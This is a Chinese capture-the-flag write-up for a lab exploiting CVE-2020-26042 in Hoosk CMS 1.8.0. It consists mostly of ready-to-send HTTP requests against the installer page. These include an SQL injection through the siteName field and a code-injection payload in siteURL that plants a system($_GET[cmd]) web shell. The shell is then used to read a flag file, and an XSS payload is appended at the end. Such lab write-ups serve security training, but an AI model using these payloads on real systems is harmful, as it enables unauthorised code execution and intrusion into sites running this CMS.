春秋云镜 CVE-2020-26042 Hoosk CMS v1.8.0 存在sql注入漏洞
靶标介绍
Hoosk CMS v1.8.0 install/index.php 存在sql注入漏洞。
启动场景
漏洞利用
SQL注入POC
POST /install/index.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
siteName=',siteTitle%3dversion()%23&siteURL=http%3A%2F%2Fa.com&dbName=hoosk&dbUserName=root&dbPass=123456&dbHost=localhost
burp抓包
POST /install/index.php HTTP/1.1
Host: eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com/install/
Upgrade-Insecure-Requests: 1
siteName=',siteTitle%3dversion()%23&siteURL=http%3A%2F%2Fa.com&dbName=mysql&dbUserName=root&dbPass=root&dbHost=localhost
访问首页
获取当前数据库database() 
当前数据库为MySQL
获取mysql所有的表名
未找到flag字段,获取所有的数据库
information_schema,cms,mysql,performance_schema,sys
找寻无果,gg,还是RCE吧
RCE POC
POST /install/index.php HTTP/1.1
Host: XXXXX
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
siteName=test&siteURL=http%3A%2F%2Fa.com%2F%27%29%3Bphpinfo%28%29%3Bexit%28%29%3B%2F%2F&dbName=hoosk&dbUserName=root&dbPass=123456&dbHost=localhost
burp改包
POST /install/index.php HTTP/1.1
Host: eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 160
Origin: http://eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com/install/
Upgrade-Insecure-Requests: 1
siteName=test&siteURL=http%3A%2F%2Fa.com%2F')%3Bsystem(%24_GET%5Bcmd%5D)%3Bphpinfo()%3Bexit()%3B%2F%2F&dbName=mysql&dbUserName=root&dbPass=root&dbHost=localhost
http://eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com
http://eci-2zege7z5glwxpnyr3q13.cloudeci1.ichunqiu.com/?cmd=cat%20…/…/…/flag
得到flag
flag{437833f0-f671-4139-9a32-005a1f8b36bc}
附带个XSS poc
POST /code-env/Hoosk-master/install/index.php HTTP/1.1
Host: xxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
siteName=test&siteURL="<script>alert(1)</script>&dbName=hoosk&dbUserName=root&dbPass=123456&dbHost=localhost%3A3306
